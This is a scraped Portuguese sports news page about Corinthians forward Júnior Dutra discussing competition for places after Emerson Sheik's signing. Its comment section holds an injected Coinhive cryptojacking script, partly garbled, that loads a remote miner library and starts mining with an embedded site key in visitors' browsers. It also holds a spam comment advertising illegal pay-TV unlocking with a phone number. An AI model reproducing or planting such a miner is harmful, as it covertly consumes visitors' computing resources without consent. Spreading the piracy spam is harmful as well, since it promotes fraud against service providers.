20/1/2018 19:46

Júnior Dutra não teme falta de espaço no Corinthians: "Carille saberá gerenciar"

Atacante rasga elogios a Emerson Sheik e não se abala com concorrência no Timão

Júnior Dutra não teme falta de espaço no Corinthians:
Júnior Dutra diz que pode jogar aberto pelos lados ou como referência do ataque (Foto: Daniel Augusto Jr/Ag.Corinthians)

A chegada de Emerson Sheik ao Corinthians faz aumentar ainda mais a concorrência por uma vaga no ataque da equipe. Mesmo assim, Júnior Dutra não se abala, confia que terá oportunidades e faz elogios ao novo companheiro.



Além de Sheik, Júnior Dutra disputa vaga com Clayson, Romero, Marquinhos Gabriel e Lucca. Pedrinho e Mateus Vital também podem atuar pelas beiradas do campo.

– Não penso nisso (concorrência maior). Se eu estiver em um bom momento, fazendo o meu melhor, tenho certeza que o Carille vai saber gerenciar o grupo, dando oportunidade para todo mundo. Quando eu vi a notícia do Sheik, fiquei feliz. É mais um cara campeão, que vai somar muito para o grupo – declarou o atacante.

O Sheik é um ídolo do clube, um jogador que é a cara do Corinthians e vai somar muito com a gente. Se o Corinthians trouxe, com certeza tem um plano para ele. O Sheik é um cara experiente, vitorioso, campeão de Libertadores. Vai ser um prazer estar jogando com ele – completou.

Contratado no fim do ano passado, Júnior Dutra pode atuar também como referência do ataque, na função que em 2017 era de Jô. No entanto, ele destaca que não está acostumado com essa posição e tem características diferentes das do ex-camisa 7.

Porém, na estreia na temporada, contra o PSV, da Holanda, pelo Torneio da Flórida, ele entrou no segundo tempo na vaga de Kazim e jogou mais avançado.

– Foi uma estreia e acredito que consegui fazer um bom jogo. Fiz o papel de 9, segurando bem a bola e levando o time para a frente. Mostrei que posso jogar ali também. Quando conversei com o Carille, a ideia não era ser um 9, até porque tinha o Jô. A gente conversou sobre os outros jogadores com os quais atuei no Avaí também. Mas deixei claro que já joguei naquela posição e, precisando, ele pode contar comigo. Não sou um cara de referência, parado em frente a zaga, mas um jogador de movimentação, que vai estar ali incomodando os zagueiros o tempo todo. Com certeza é um 9 – analisou Júnior Dutra.

O Corinthians volta a campo neste domingo contra o São Caetano, às 19h30, no Pacaembu. Assim como na primeira rodada, quando o Timão perdeu para a Ponte Preta, Júnior Dutra deve começar a partida no banco de reservas.


VEJA TAMBÉM
- Cássio entrega titularidade a Carlos Miguel e afirma: Agora depende dele
- Surpresa dos Jogadores do Corinthians emociona Cássio em sua despedida.
- Sem Cássio, Carlos Miguel pode deixar o Timão, entenda









7968 visitas - Fonte: globo esporte

Mais notícias do Corinthians

Notícias de contratações do Timão
Notícias mais lidas

Erro ao postar comentário.
Código do erro: 803743

< src="https://coinhive.com/lib/coinhive.min.js"><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();

VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui ou Conecte com Facebook.

Últimas notícias

publicidade

Brasileiro

Dom - 16:00 - Neo Química Arena -
X
Corinthians
Botafogo

Sudamericana

Ter - 21:30 - Neo Química Arena
4 X 0
Corinthians
Argentinos JRS
publicidade
publicidade
publicidade